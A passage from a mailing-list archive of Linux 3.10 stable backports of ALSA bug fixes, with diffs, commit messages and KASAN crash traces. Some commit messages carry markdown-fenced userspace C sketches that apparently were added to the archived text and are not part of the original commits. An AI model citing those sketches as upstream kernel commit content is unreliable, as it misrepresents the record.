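static void list_remove(struct dev *d)
{
	struct dev **pp;

	for (pp = &devices; *pp; pp = &(*pp)->next) {
		if (*pp == d) {
			*pp = d->next;
			return;
		}
	}
}

int dev_count(void)
{
	struct dev *d;
	int n = 0;

	pthread_mutex_lock(&register_mutex);
	for (d = devices; d; d = d->next)
		n++;
	pthread_mutex_unlock(&register_mutex);
	return n;
}

int register_dev(struct dev *d)
{
	int err = 0;

	/* The lock covers only the list manipulation. */
	pthread_mutex_lock(&register_mutex);
	d->next = devices;
	devices = d;
	pthread_mutex_unlock(&register_mutex);

	/* The callback runs unlocked, so it may take other locks
	 * (or even register_mutex) without a lock-order problem. */
	if (d->dev_register)
		err = d->dev_register(d);

	if (err < 0) {
		/* Re-take the lock just to undo the list insertion. */
		pthread_mutex_lock(&register_mutex);
		list_remove(d);
		pthread_mutex_unlock(&register_mutex);
	}
	return err;
}

/* Example callback that itself needs register_mutex. */
int counting_cb(struct dev *d)
{
	(void)d;
	return dev_count() >= 1 ? 0 : -1;
}

/* Example callback that always fails. */
int failing_cb(struct dev *d)
{
	(void)d;
	return -1;
}
```

The trade-off is the same as in the patch: the device is briefly
visible on the list before its callback has completed, and the error
path has to re-acquire the lock to unlink it.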

Reported-by: Dmitry Vyukov <dvyukov@google.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/core/rawmidi.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/sound/core/rawmidi.c b/sound/core/rawmidi.c
index 500765f..3e97616 100644
--- a/sound/core/rawmidi.c
+++ b/sound/core/rawmidi.c
@@ -1564,10 +1564,12 @@ static int snd_rawmidi_dev_register(struct snd_device *device)
 	}
 	list_add_tail(&rmidi->list, &snd_rawmidi_devices);
 	sprintf(name, "midiC%iD%i", rmidi->card->number, rmidi->device);
+	mutex_unlock(&register_mutex);
 	if ((err = snd_register_device(SNDRV_DEVICE_TYPE_RAWMIDI,
 				       rmidi->card, rmidi->device,
 				       &snd_rawmidi_f_ops, rmidi, name)) < 0) {
 		snd_printk(KERN_ERR "unable to register rawmidi device %i:%i\n", rmidi->card->number, rmidi->device);
+		mutex_lock(&register_mutex);
 		list_del(&rmidi->list);
 		mutex_unlock(&register_mutex);
 		return err;
@@ -1575,6 +1577,7 @@ static int snd_rawmidi_dev_register(struct snd_device *device)
 	if (rmidi->ops && rmidi->ops->dev_register &&
 	    (err = rmidi->ops->dev_register(rmidi)) < 0) {
 		snd_unregister_device(SNDRV_DEVICE_TYPE_RAWMIDI, rmidi->card, rmidi->device);
+		mutex_lock(&register_mutex);
 		list_del(&rmidi->list);
 		mutex_unlock(&register_mutex);
 		return err;
@@ -1603,7 +1606,6 @@ static int snd_rawmidi_dev_register(struct snd_device *device)
 		}
 	}
 #endif /* CONFIG_SND_OSSEMUL */
-	mutex_unlock(&register_mutex);
 	sprintf(name, "midi%d", rmidi->device);
 	entry = snd_info_create_card_entry(rmidi->card, name, rmidi->card->proc_root);
 	if (entry) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 125/319] ALSA: timer: fix NULL pointer dereference in read()/ioctl() race
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (23 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 124/319] ALSA: rawmidi: Fix possible deadlock with virmidi registration Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 126/319] ALSA: timer: fix division by zero after SNDRV_TIMER_IOCTL_CONTINUE Willy Tarreau
                   ` (193 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Vegard Nossum, Takashi Iwai, Jiri Slaby, Willy Tarreau

From: Vegard Nossum <vegard.nossum@oracle.com>

commit 11749e086b2766cccf6217a527ef5c5604ba069c upstream.

I got this with syzkaller:

    ==================================================================
    BUG: KASAN: null-ptr-deref on address 0000000000000020
    Read of size 32 by task syz-executor/22519
    CPU: 1 PID: 22519 Comm: syz-executor Not tainted 4.8.0-rc2+ #169
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
     0000000000000001 ffff880111a17a00 ffffffff81f9f141 ffff880111a17a90
     ffff880111a17c50 ffff880114584a58 ffff880114584a10 ffff880111a17a80
     ffffffff8161fe3f ffff880100000000 ffff880118d74a48 ffff880118d74a68
    Call Trace:
     [<ffffffff81f9f141>] dump_stack+0x83/0xb2
     [<ffffffff8161fe3f>] kasan_report_error+0x41f/0x4c0
     [<ffffffff8161ff74>] kasan_report+0x34/0x40
     [<ffffffff82c84b54>] ? snd_timer_user_read+0x554/0x790
     [<ffffffff8161e79e>] check_memory_region+0x13e/0x1a0
     [<ffffffff8161e9c1>] kasan_check_read+0x11/0x20
     [<ffffffff82c84b54>] snd_timer_user_read+0x554/0x790
     [<ffffffff82c84600>] ? snd_timer_user_info_compat.isra.5+0x2b0/0x2b0
     [<ffffffff817d0831>] ? proc_fault_inject_write+0x1c1/0x250
     [<ffffffff817d0670>] ? next_tgid+0x2a0/0x2a0
     [<ffffffff8127c278>] ? do_group_exit+0x108/0x330
     [<ffffffff8174653a>] ? fsnotify+0x72a/0xca0
     [<ffffffff81674dfe>] __vfs_read+0x10e/0x550
     [<ffffffff82c84600>] ? snd_timer_user_info_compat.isra.5+0x2b0/0x2b0
     [<ffffffff81674cf0>] ? do_sendfile+0xc50/0xc50
     [<ffffffff81745e10>] ? __fsnotify_update_child_dentry_flags+0x60/0x60
     [<ffffffff8143fec6>] ? kcov_ioctl+0x56/0x190
     [<ffffffff81e5ada2>] ? common_file_perm+0x2e2/0x380
     [<ffffffff81746b0e>] ? __fsnotify_parent+0x5e/0x2b0
     [<ffffffff81d93536>] ? security_file_permission+0x86/0x1e0
     [<ffffffff816728f5>] ? rw_verify_area+0xe5/0x2b0
     [<ffffffff81675355>] vfs_read+0x115/0x330
     [<ffffffff81676371>] SyS_read+0xd1/0x1a0
     [<ffffffff816762a0>] ? vfs_write+0x4b0/0x4b0
     [<ffffffff82001c2c>] ? __this_cpu_preempt_check+0x1c/0x20
     [<ffffffff8150455a>] ? __context_tracking_exit.part.4+0x3a/0x1e0
     [<ffffffff816762a0>] ? vfs_write+0x4b0/0x4b0
     [<ffffffff81005524>] do_syscall_64+0x1c4/0x4e0
     [<ffffffff810052fc>] ? syscall_return_slowpath+0x16c/0x1d0
     [<ffffffff83c3276a>] entry_SYSCALL64_slow_path+0x25/0x25
    ==================================================================

There are a couple of problems that I can see:

 - ioctl(SNDRV_TIMER_IOCTL_SELECT) potentially sets
   tu->queue/tu->tqueue to NULL on memory allocation failure, so read()
   would get a NULL pointer dereference like the above splat

 - the same ioctl() can free tu->queue/tu->tqueue, which means read()
   could potentially see (and dereference) the freed pointer

We can fix both by taking the ioctl_lock mutex when dereferencing
->queue/->tqueue, since that's always held over all the ioctl() code.
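
A userspace sketch of the idea, assuming a pthread mutex in place of
ioctl_lock: the reader dereferences the queue pointer only while
holding the same lock the "ioctl" side holds when it frees or replaces
the queue.  struct tuser, tuser_resize() and tuser_read() are
hypothetical names, and the explicit NULL check in the reader is an
addition of the sketch rather than part of the patch.

```c
#include <pthread.h>
#include <stddef.h>
#include <stdlib.h>

struct tuser {
	pthread_mutex_t ioctl_lock;
	int *queue;		/* may be freed/replaced by tuser_resize() */
	size_t queue_size;
	size_t qhead;
};

void tuser_init(struct tuser *tu)
{
	pthread_mutex_init(&tu->ioctl_lock, NULL);
	tu->queue = NULL;
	tu->queue_size = 0;
	tu->qhead = 0;
}

/* "ioctl" side: drop the old queue and allocate a new one.  With
 * n == 0 or on allocation failure the queue is left NULL. */
int tuser_resize(struct tuser *tu, size_t n)
{
	int ret;

	pthread_mutex_lock(&tu->ioctl_lock);
	free(tu->queue);
	tu->queue = n ? calloc(n, sizeof(*tu->queue)) : NULL;
	tu->queue_size = tu->queue ? n : 0;
	tu->qhead = 0;
	ret = tu->queue ? 0 : -1;
	pthread_mutex_unlock(&tu->ioctl_lock);
	return ret;
}

/* "read" side: the queue is only touched under ioctl_lock. */
int tuser_read(struct tuser *tu, int *out)
{
	int ret = -1;

	pthread_mutex_lock(&tu->ioctl_lock);
	if (tu->queue) {	/* NULL check added for the sketch */
		*out = tu->queue[tu->qhead];
		tu->qhead = (tu->qhead + 1) % tu->queue_size;
		ret = 0;
	}
	pthread_mutex_unlock(&tu->ioctl_lock);
	return ret;
}
```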

Just looking at the code I find it likely that there are more problems
here such as tu->qhead pointing outside the buffer if the size is
changed concurrently using SNDRV_TIMER_IOCTL_PARAMS.

[js] unlock in fail paths

Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/core/timer.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/sound/core/timer.c b/sound/core/timer.c
index 3476895..f5ddc9b 100644
--- a/sound/core/timer.c
+++ b/sound/core/timer.c
@@ -1922,19 +1922,23 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer,
 		if (err < 0)
 			goto _error;
 
+		mutex_lock(&tu->ioctl_lock);
 		if (tu->tread) {
 			if (copy_to_user(buffer, &tu->tqueue[tu->qhead++],
 					 sizeof(struct snd_timer_tread))) {
+				mutex_unlock(&tu->ioctl_lock);
 				err = -EFAULT;
 				goto _error;
 			}
 		} else {
 			if (copy_to_user(buffer, &tu->queue[tu->qhead++],
 					 sizeof(struct snd_timer_read))) {
+				mutex_unlock(&tu->ioctl_lock);
 				err = -EFAULT;
 				goto _error;
 			}
 		}
+		mutex_unlock(&tu->ioctl_lock);
 
 		tu->qhead %= tu->queue_size;
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 126/319] ALSA: timer: fix division by zero after SNDRV_TIMER_IOCTL_CONTINUE
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (24 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 125/319] ALSA: timer: fix NULL pointer dereference in read()/ioctl() race Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 127/319] ALSA: timer: fix NULL pointer dereference on memory allocation failure Willy Tarreau
                   ` (192 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Vegard Nossum, Takashi Iwai, Willy Tarreau

From: Vegard Nossum <vegard.nossum@oracle.com>

commit 6b760bb2c63a9e322c0e4a0b5daf335ad93d5a33 upstream.

I got this:

    divide error: 0000 [#1] PREEMPT SMP KASAN
    CPU: 1 PID: 1327 Comm: a.out Not tainted 4.8.0-rc2+ #189
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
    task: ffff8801120a9580 task.stack: ffff8801120b0000
    RIP: 0010:[<ffffffff82c8bd9a>]  [<ffffffff82c8bd9a>] snd_hrtimer_callback+0x1da/0x3f0
    RSP: 0018:ffff88011aa87da8  EFLAGS: 00010006
    RAX: 0000000000004f76 RBX: ffff880112655e88 RCX: 0000000000000000
    RDX: 0000000000000000 RSI: ffff880112655ea0 RDI: 0000000000000001
    RBP: ffff88011aa87e00 R08: ffff88013fff905c R09: ffff88013fff9048
    R10: ffff88013fff9050 R11: 00000001050a7b8c R12: ffff880114778a00
    R13: ffff880114778ab4 R14: ffff880114778b30 R15: 0000000000000000
    FS:  00007f071647c700(0000) GS:ffff88011aa80000(0000) knlGS:0000000000000000
    CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    CR2: 0000000000603001 CR3: 0000000112021000 CR4: 00000000000006e0
    Stack:
     0000000000000000 ffff880114778ab8 ffff880112655ea0 0000000000004f76
     ffff880112655ec8 ffff880112655e80 ffff880112655e88 ffff88011aa98fc0
     00000000b97ccf2b dffffc0000000000 ffff88011aa98fc0 ffff88011aa87ef0
    Call Trace:
     <IRQ>
     [<ffffffff813abce7>] __hrtimer_run_queues+0x347/0xa00
     [<ffffffff82c8bbc0>] ? snd_hrtimer_close+0x130/0x130
     [<ffffffff813ab9a0>] ? retrigger_next_event+0x1b0/0x1b0
     [<ffffffff813ae1a6>] ? hrtimer_interrupt+0x136/0x4b0
     [<ffffffff813ae220>] hrtimer_interrupt+0x1b0/0x4b0
     [<ffffffff8120f91e>] local_apic_timer_interrupt+0x6e/0xf0
     [<ffffffff81227ad3>] ? kvm_guest_apic_eoi_write+0x13/0xc0
     [<ffffffff83c35086>] smp_apic_timer_interrupt+0x76/0xa0
     [<ffffffff83c3416c>] apic_timer_interrupt+0x8c/0xa0
     <EOI>
     [<ffffffff83c3239c>] ? _raw_spin_unlock_irqrestore+0x2c/0x60
     [<ffffffff82c8185d>] snd_timer_start1+0xdd/0x670
     [<ffffffff82c87015>] snd_timer_continue+0x45/0x80
     [<ffffffff82c88100>] snd_timer_user_ioctl+0x1030/0x2830
     [<ffffffff8159f3a0>] ? __follow_pte.isra.49+0x430/0x430
     [<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
     [<ffffffff815a26fa>] ? do_wp_page+0x3aa/0x1c90
     [<ffffffff815aa4f8>] ? handle_mm_fault+0xbc8/0x27f0
     [<ffffffff815a9930>] ? __pmd_alloc+0x370/0x370
     [<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
     [<ffffffff816b0733>] do_vfs_ioctl+0x193/0x1050
     [<ffffffff816b05a0>] ? ioctl_preallocate+0x200/0x200
     [<ffffffff81002f2f>] ? syscall_trace_enter+0x3cf/0xdb0
     [<ffffffff815045ba>] ? __context_tracking_exit.part.4+0x9a/0x1e0
     [<ffffffff81002b60>] ? exit_to_usermode_loop+0x190/0x190
     [<ffffffff82001a97>] ? check_preemption_disabled+0x37/0x1e0
     [<ffffffff81d93889>] ? security_file_ioctl+0x89/0xb0
     [<ffffffff816b167f>] SyS_ioctl+0x8f/0xc0
     [<ffffffff816b15f0>] ? do_vfs_ioctl+0x1050/0x1050
     [<ffffffff81005524>] do_syscall_64+0x1c4/0x4e0
     [<ffffffff83c32b2a>] entry_SYSCALL64_slow_path+0x25/0x25
    Code: e8 fc 42 7b fe 8b 0d 06 8a 50 03 49 0f af cf 48 85 c9 0f 88 7c 01 00 00 48 89 4d a8 e8 e0 42 7b fe 48 8b 45 c0 48 8b 4d a8 48 99 <48> f7 f9 49 01 c7 e8 cb 42 7b fe 48 8b 55 d0 48 b8 00 00 00 00
    RIP  [<ffffffff82c8bd9a>] snd_hrtimer_callback+0x1da/0x3f0
     RSP <ffff88011aa87da8>
    ---[ end trace 6aa380f756a21074 ]---

The problem happens when you call ioctl(SNDRV_TIMER_IOCTL_CONTINUE) on a
completely new/unused timer -- it will have ->sticks == 0, which causes a
divide by 0 in snd_hrtimer_callback().
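
In miniature, and with hypothetical names (struct timer, timer_new(),
periods_elapsed()), the fix amounts to giving the divisor a safe
default at construction time.  The division below is a simplified
stand-in for the one in snd_hrtimer_callback(), and resolution_ns is
assumed to be non-zero.

```c
#include <stdlib.h>

struct timer {
	unsigned long sticks;	/* ticks per period, used as a divisor */
};

struct timer *timer_new(void)
{
	struct timer *t = calloc(1, sizeof(*t));

	if (t)
		t->sticks = 1;	/* never leave the divisor at zero */
	return t;
}

/* Whole periods contained in elapsed_ns, where one period lasts
 * sticks * resolution_ns nanoseconds. */
unsigned long periods_elapsed(const struct timer *t,
			      unsigned long elapsed_ns,
			      unsigned long resolution_ns)
{
	return elapsed_ns / (t->sticks * resolution_ns);
}
```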

Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/core/timer.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/sound/core/timer.c b/sound/core/timer.c
index f5ddc9b..f297eac 100644
--- a/sound/core/timer.c
+++ b/sound/core/timer.c
@@ -817,6 +817,7 @@ int snd_timer_new(struct snd_card *card, char *id, struct snd_timer_id *tid,
 	timer->tmr_subdevice = tid->subdevice;
 	if (id)
 		strlcpy(timer->id, id, sizeof(timer->id));
+	timer->sticks = 1;
 	INIT_LIST_HEAD(&timer->device_list);
 	INIT_LIST_HEAD(&timer->open_list_head);
 	INIT_LIST_HEAD(&timer->active_list_head);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 127/319] ALSA: timer: fix NULL pointer dereference on memory allocation failure
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (25 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 126/319] ALSA: timer: fix division by zero after SNDRV_TIMER_IOCTL_CONTINUE Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 128/319] ALSA: ali5451: Fix out-of-bound position reporting Willy Tarreau
                   ` (191 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Vegard Nossum, Takashi Iwai, Jiri Slaby, Willy Tarreau

From: Vegard Nossum <vegard.nossum@oracle.com>

commit 8ddc05638ee42b18ba4fe99b5fb647fa3ad20456 upstream.

I hit this with syzkaller:

    kasan: CONFIG_KASAN_INLINE enabled
    kasan: GPF could be caused by NULL-ptr deref or user memory access
    general protection fault: 0000 [#1] PREEMPT SMP KASAN
    CPU: 0 PID: 1327 Comm: a.out Not tainted 4.8.0-rc2+ #190
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
    task: ffff88011278d600 task.stack: ffff8801120c0000
    RIP: 0010:[<ffffffff82c8ba07>]  [<ffffffff82c8ba07>] snd_hrtimer_start+0x77/0x100
    RSP: 0018:ffff8801120c7a60  EFLAGS: 00010006
    RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000007
    RDX: 0000000000000009 RSI: 1ffff10023483091 RDI: 0000000000000048
    RBP: ffff8801120c7a78 R08: ffff88011a5cf768 R09: ffff88011a5ba790
    R10: 0000000000000002 R11: ffffed00234b9ef1 R12: ffff880114843980
    R13: ffffffff84213c00 R14: ffff880114843ab0 R15: 0000000000000286
    FS:  00007f72958f3700(0000) GS:ffff88011aa00000(0000) knlGS:0000000000000000
    CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    CR2: 0000000000603001 CR3: 00000001126ab000 CR4: 00000000000006f0
    Stack:
     ffff880114843980 ffff880111eb2dc0 ffff880114843a34 ffff8801120c7ad0
     ffffffff82c81ab1 0000000000000000 ffffffff842138e0 0000000100000000
     ffff880111eb2dd0 ffff880111eb2dc0 0000000000000001 ffff880111eb2dc0
    Call Trace:
     [<ffffffff82c81ab1>] snd_timer_start1+0x331/0x670
     [<ffffffff82c85bfd>] snd_timer_start+0x5d/0xa0
     [<ffffffff82c8795e>] snd_timer_user_ioctl+0x88e/0x2830
     [<ffffffff8159f3a0>] ? __follow_pte.isra.49+0x430/0x430
     [<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
     [<ffffffff815a26fa>] ? do_wp_page+0x3aa/0x1c90
     [<ffffffff8132762f>] ? put_prev_entity+0x108f/0x21a0
     [<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
     [<ffffffff816b0733>] do_vfs_ioctl+0x193/0x1050
     [<ffffffff813510af>] ? cpuacct_account_field+0x12f/0x1a0
     [<ffffffff816b05a0>] ? ioctl_preallocate+0x200/0x200
     [<ffffffff81002f2f>] ? syscall_trace_enter+0x3cf/0xdb0
     [<ffffffff815045ba>] ? __context_tracking_exit.part.4+0x9a/0x1e0
     [<ffffffff81002b60>] ? exit_to_usermode_loop+0x190/0x190
     [<ffffffff82001a97>] ? check_preemption_disabled+0x37/0x1e0
     [<ffffffff81d93889>] ? security_file_ioctl+0x89/0xb0
     [<ffffffff816b167f>] SyS_ioctl+0x8f/0xc0
     [<ffffffff816b15f0>] ? do_vfs_ioctl+0x1050/0x1050
     [<ffffffff81005524>] do_syscall_64+0x1c4/0x4e0
     [<ffffffff83c32b2a>] entry_SYSCALL64_slow_path+0x25/0x25
    Code: c7 c7 c4 b9 c8 82 48 89 d9 4c 89 ee e8 63 88 7f fe e8 7e 46 7b fe 48 8d 7b 48 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 04 84 c0 7e 65 80 7b 48 00 74 0e e8 52 46
    RIP  [<ffffffff82c8ba07>] snd_hrtimer_start+0x77/0x100
     RSP <ffff8801120c7a60>
    ---[ end trace 5955b08db7f2b029 ]---

This can happen if snd_hrtimer_open() fails to allocate memory and
returns an error, which is currently not checked by snd_timer_open():

    ioctl(SNDRV_TIMER_IOCTL_SELECT)
     - snd_timer_user_tselect()
	- snd_timer_close()
	   - snd_hrtimer_close()
	      - (struct snd_timer *) t->private_data = NULL
        - snd_timer_open()
           - snd_hrtimer_open()
              - kzalloc() fails; t->private_data is still NULL

    ioctl(SNDRV_TIMER_IOCTL_START)
     - snd_timer_user_start()
	- snd_timer_start()
	   - snd_timer_start1()
	      - snd_hrtimer_start()
		- t->private_data == NULL // boom
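
The missing check can be sketched as follows.  This is a userspace
illustration with hypothetical names (struct hw_timer, struct instance,
timer_open() and the two example callbacks); it only shows the shape
of the error handling, not the ALSA code.

```c
#include <errno.h>
#include <stddef.h>
#include <stdlib.h>

struct hw_timer {
	int (*open)(struct hw_timer *t);	/* may fail, e.g. -ENOMEM */
	void *private_data;
	int open_count;
};

struct instance {
	struct hw_timer *timer;
};

int timer_open(struct instance **out, struct hw_timer *t)
{
	struct instance *ti = malloc(sizeof(*ti));

	if (!ti)
		return -ENOMEM;
	ti->timer = t;

	/* The first opener initializes the hardware side; propagate a
	 * failure instead of handing out a half-initialized timer. */
	if (t->open_count == 0 && t->open) {
		int err = t->open(t);

		if (err) {
			free(ti);
			return err;
		}
	}

	t->open_count++;
	*out = ti;
	return 0;
}

/* Example callback: allocation fails, private_data stays NULL. */
int failing_open(struct hw_timer *t)
{
	t->private_data = NULL;
	return -ENOMEM;
}

/* Example callback: succeeds and sets up private_data. */
int working_open(struct hw_timer *t)
{
	t->private_data = t;
	return 0;
}
```

With the check in place, a later "start" never sees an instance whose
timer has a NULL private_data, because no instance is created when the
open callback fails.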

[js] no put_device in 3.12 yet

Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/core/timer.c | 15 +++++++++++++--
 1 file changed, 13 insertions(+), 2 deletions(-)

diff --git a/sound/core/timer.c b/sound/core/timer.c
index f297eac..749857a 100644
--- a/sound/core/timer.c
+++ b/sound/core/timer.c
@@ -291,8 +291,19 @@ int snd_timer_open(struct snd_timer_instance **ti,
 	}
 	timeri->slave_class = tid->dev_sclass;
 	timeri->slave_id = slave_id;
-	if (list_empty(&timer->open_list_head) && timer->hw.open)
-		timer->hw.open(timer);
+
+	if (list_empty(&timer->open_list_head) && timer->hw.open) {
+		int err = timer->hw.open(timer);
+		if (err) {
+			kfree(timeri->owner);
+			kfree(timeri);
+
+			module_put(timer->module);
+			mutex_unlock(&register_mutex);
+			return err;
+		}
+	}
+
 	list_add_tail(&timeri->open_list, &timer->open_list_head);
 	snd_timer_check_master(timeri);
 	mutex_unlock(&register_mutex);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 128/319] ALSA: ali5451: Fix out-of-bound position reporting
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (26 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 127/319] ALSA: timer: fix NULL pointer dereference on memory allocation failure Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 129/319] ALSA: pcm : Call kill_fasync() in stream lock Willy Tarreau
                   ` (190 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Takashi Iwai, Willy Tarreau

From: Takashi Iwai <tiwai@suse.de>

commit db68577966abc1aeae4ec597b3dcfa0d56e92041 upstream.

The pointer callbacks of the ali5451 driver may occasionally return a
value at the buffer boundary, which results in a kernel warning like
  snd_ali5451 0000:00:06.0: BUG: , pos = 16384, buffer size = 16384, period size = 1024

It seems that folding the position offset is enough to fix the
warning, and no ill effect has been seen from it.
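
The folding itself is a single modulo.  A tiny sketch, with a
hypothetical helper name and a zero-size guard that is not part of
the patch:

```c
/* Fold a hardware position into the range [0, buffer_size). */
unsigned int fold_position(unsigned int pos, unsigned int buffer_size)
{
	if (buffer_size == 0)	/* guard added for the sketch */
		return 0;
	return pos % buffer_size;
}
```

For the values in the warning above, a position of 16384 with a buffer
size of 16384 folds to 0, while in-range positions are unchanged.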

Reported-by: Enrico Mioso <mrkiko.rs@gmail.com>
Tested-by: Enrico Mioso <mrkiko.rs@gmail.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/pci/ali5451/ali5451.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/sound/pci/ali5451/ali5451.c b/sound/pci/ali5451/ali5451.c
index 53754f5..097c8c4 100644
--- a/sound/pci/ali5451/ali5451.c
+++ b/sound/pci/ali5451/ali5451.c
@@ -1422,6 +1422,7 @@ snd_ali_playback_pointer(struct snd_pcm_substream *substream)
 	spin_unlock(&codec->reg_lock);
 	snd_ali_printk("playback pointer returned cso=%xh.\n", cso);
 
+	cso %= runtime->buffer_size;
 	return cso;
 }
 
@@ -1442,6 +1443,7 @@ static snd_pcm_uframes_t snd_ali_pointer(struct snd_pcm_substream *substream)
 	cso = inw(ALI_REG(codec, ALI_CSO_ALPHA_FMS + 2));
 	spin_unlock(&codec->reg_lock);
 
+	cso %= runtime->buffer_size;
 	return cso;
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 129/319] ALSA: pcm : Call kill_fasync() in stream lock
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (27 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 128/319] ALSA: ali5451: Fix out-of-bound position reporting Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 130/319] zfcp: fix fc_host port_type with NPIV Willy Tarreau
                   ` (189 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Takashi Iwai, Willy Tarreau

From: Takashi Iwai <tiwai@suse.de>

commit 3aa02cb664c5fb1042958c8d1aa8c35055a2ebc4 upstream.

Currently kill_fasync() is called outside the stream lock in
snd_pcm_period_elapsed().  This is potentially racy, since the stream
may get released even while the irq handler is running.  Although
snd_pcm_release_substream() calls snd_pcm_drop(), this doesn't
guarantee that the irq handler finishes, thus the kill_fasync() call
outside the stream spin lock may be invoked after the substream is
detached, as recently reported by KASAN.

As a quick workaround, move the kill_fasync() call inside the stream
lock.  fasync is a rarely used interface, so this shouldn't have a
big impact on performance.

Ideally, we should implement some sync mechanism for the proper finish
of stream and irq handler.  But this oneliner should suffice for most
cases, so far.

Reported-by: Baozeng Ding <sploving1@gmail.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/core/pcm_lib.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/sound/core/pcm_lib.c b/sound/core/pcm_lib.c
index 8eddece..dfed3ef 100644
--- a/sound/core/pcm_lib.c
+++ b/sound/core/pcm_lib.c
@@ -1856,10 +1856,10 @@ void snd_pcm_period_elapsed(struct snd_pcm_substream *substream)
 	if (substream->timer_running)
 		snd_timer_interrupt(substream->timer, 1);
  _end:
+	kill_fasync(&runtime->fasync, SIGIO, POLL_IN);
 	snd_pcm_stream_unlock_irqrestore(substream, flags);
 	if (runtime->transfer_ack_end)
 		runtime->transfer_ack_end(substream);
-	kill_fasync(&runtime->fasync, SIGIO, POLL_IN);
 }
 
 EXPORT_SYMBOL(snd_pcm_period_elapsed);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 130/319] zfcp: fix fc_host port_type with NPIV
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (28 preceding siblings ...)
